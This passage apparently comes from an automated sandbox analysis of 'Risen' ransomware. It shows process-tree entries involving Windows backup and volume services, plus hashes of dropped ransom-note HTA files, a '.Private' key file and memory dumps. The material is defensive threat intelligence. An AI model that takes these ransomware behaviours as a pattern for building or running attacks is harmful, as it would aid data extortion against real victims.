                                                                                                                                    "C:\Windows\system32\wbengine.exe"
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:9208
                                                                                                                                  • C:\Windows\System32\vdsldr.exe
                                                                                                                                    C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:8908
                                                                                                                                    • C:\Windows\System32\vds.exe
                                                                                                                                      C:\Windows\System32\vds.exe
                                                                                                                                      1⤵
                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                      PID:7468
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3612 -ip 3612
                                                                                                                                      1⤵
                                                                                                                                        PID:6080

                                                                                                                                      Network

                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                      Replay Monitor

                                                                                                                                      Loading Replay Monitor...

                                                                                                                                      Downloads

                                                                                                                                      • C:\$Risen_Guide.hta

                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                        MD5

                                                                                                                                        3ed8e52fe434b5f056aabc805d384013

                                                                                                                                        SHA1

                                                                                                                                        8f2c23dc76105af341cf883954aeb2be60e37cce

                                                                                                                                        SHA256

                                                                                                                                        599cc4620b50d256167e3936c38f4a542e756edd5ec85f1cc9cddc1182c14b02

                                                                                                                                        SHA512

                                                                                                                                        7a1fbd852c1442e2ca5d729bb7e3b9884e54cbd33916dbe86ac0426b44a1b491850a1a2557b1e72931f201347e1acb4a9a2c947630e683763d0deda9ac301e81

                                                                                                                                      • C:\ProgramData\$Risen[AAFJKAF8XA].Private

                                                                                                                                        Filesize

                                                                                                                                        1KB

                                                                                                                                        MD5

                                                                                                                                        6a1974f71093b501fd7f9e074b0474ec

                                                                                                                                        SHA1

                                                                                                                                        ea480c2e6639b061fdf54d4214ecb432415e3369

                                                                                                                                        SHA256

                                                                                                                                        63f686ea4f8a13a6f1b2242386c1c2ad943996697ed46d6f9237fdab17681c16

                                                                                                                                        SHA512

                                                                                                                                        e09c316bf67f594413c6a9d70b9f6eff91ed5a24b377a5b7c82209cdf9e314bce10d338b098452071be822293b7b8287d655457f1db9a977f539cfdab849d081

                                                                                                                                      • C:\ProgramData\$Risen_Guide.hta

                                                                                                                                        Filesize

                                                                                                                                        7KB

                                                                                                                                        MD5

                                                                                                                                        4149ced50d1167ca531bcd43484eed96

                                                                                                                                        SHA1

                                                                                                                                        cfce8bad09e6947f9982549b07e44888ac8d9e08

                                                                                                                                        SHA256

                                                                                                                                        277d2352139f0955a018dcf5252ec4ee726418f331eea260d83aa4c9dcc40a8e

                                                                                                                                        SHA512

                                                                                                                                        52bbc9a60917ada5ab8909ab083bc13e01e2fb83cf8f748539c0db136a8c8199687d394a41e223d390ef3c94fdf511e1e55d250829cbef587135de1712f02bbf

                                                                                                                                      • C:\ProgramData\$Risen_Note.txt

                                                                                                                                        Filesize

                                                                                                                                        1KB

                                                                                                                                        MD5

                                                                                                                                        d50d9d7af7389b37ddd2d4e9ee1c68c0

                                                                                                                                        SHA1

                                                                                                                                        6cb8d45479c45920cd46ccf9c65417f00955431b

                                                                                                                                        SHA256

                                                                                                                                        ce9f27e0748409fba2fee29f39a8fb49eabefbff980358374d77a71c5a9944d8

                                                                                                                                        SHA512

                                                                                                                                        6e5040e8146f63aaf184af16c42a9e668765d25114bee389499a00aafa744f92c50a06d95828699cacbc07ab26fd91f5cf87f4e17131572a01fe844bf432cabb

                                                                                                                                      • memory/112-0-0x00000000001F0000-0x000000000025E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        440KB

                                                                                                                                      • memory/112-15651-0x00000000001F0000-0x000000000025E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        440KB

                                                                                                                                      • memory/112-29866-0x00000000001F0000-0x000000000025E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        440KB

                                                                                                                                      • memory/112-29868-0x00000000001F0000-0x000000000025E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        440KB